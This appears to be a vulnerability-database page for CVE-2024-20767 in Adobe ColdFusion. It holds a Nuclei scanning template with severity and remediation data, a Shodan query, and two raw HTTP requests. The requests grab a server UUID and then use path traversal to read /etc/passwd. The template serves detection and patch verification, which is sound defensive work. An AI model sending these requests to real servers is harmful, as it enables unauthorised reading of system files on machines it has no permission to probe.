| Reporter | Title | Published | Views | Family All 27 |
|---|---|---|---|---|
| Exploit for Improper Access Control in Adobe Coldfusion | 26 Mar 202406:51 | – | githubexploit | |
| Exploit for Improper Access Control in Adobe Coldfusion | 26 Mar 202410:03 | – | githubexploit | |
| Exploit for Improper Access Control in Adobe Coldfusion | 26 Mar 202419:17 | – | githubexploit | |
| CVE-2024-20767 | 18 Mar 202400:00 | – | attackerkb | |
| The vulnerability of the ColdFusion software platform, related to deficiencies in access control, allows attackers to gain access to confidential information. | 20 Mar 202400:00 | – | bdu_fstec | |
| CVE-2024-20767 | 18 Mar 202413:21 | – | circl | |
| Adobe ColdFusion Improper Access Control Vulnerability | 16 Dec 202400:00 | – | cisa_kev | |
| CISA Adds Two Known Exploited Vulnerabilities to Catalog | 16 Dec 202412:00 | – | cisa | |
| Adobe ColdFusion 访问控制错误漏洞 | 18 Mar 202400:00 | – | cnnvd | |
| Adobe ColdFusion Access Control Error Vulnerability (CNVD-2024-21156) | 21 Mar 202400:00 | – | cnvd |
id: CVE-2024-20767
info:
name: Adobe ColdFusion - Arbitrary File Read
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.
impact: |
Unauthenticated attackers can read and write arbitrary files on the server, potentially leading to complete system compromise.
remediation: |
Update Adobe ColdFusion to version 2023.7, 2021.13 or later depending on your version.
reference:
- https://jeva.cc/2973.html
- https://nvd.nist.gov/vuln/detail/CVE-2024-20767
- https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html
- https://github.com/Praison001/CVE-2024-20767-Adobe-ColdFusion
- https://github.com/Hatcat123/my_stars
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
cvss-score: 8.2
cve-id: CVE-2024-20767
cwe-id: CWE-284
epss-score: 0.98514
epss-percentile: 0.99914
cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
shodan-query: http.component:"Adobe ColdFusion"
product: coldfusion
vendor: adobe
tags: cve,cve2024,adobe,coldfusion,lfr,kev,vkev,vuln
http:
- raw:
- |
GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: {{Hostname}}
- |
GET /hax/../pms?module=logging&file_name=../../../../../../../../../../../../../../../../../../etc/passwd&number_of_lines=1000 HTTP/1.1
Host: {{Hostname}}
uuid: {{extracted_uuid}}
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(body_1, 'wddxPacket')"
- "contains(header_2, 'application/json')"
- "contains(body_2, '/bin/bash')"
condition: and
extractors:
- type: regex
part: body_1
name: extracted_uuid
group: 1
regex:
- "<var name='uuid'><string>(.*)</string>"
internal: true
# digest: 490a0046304402206ea1da2574a3f15da71c92e4921eadd1ed2f6d64d2d63ed9cd6b53d603a85fb6022038014dd303417c4ef45e0186321034acd12b312ea3e68a0623b885b6e14081b6:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation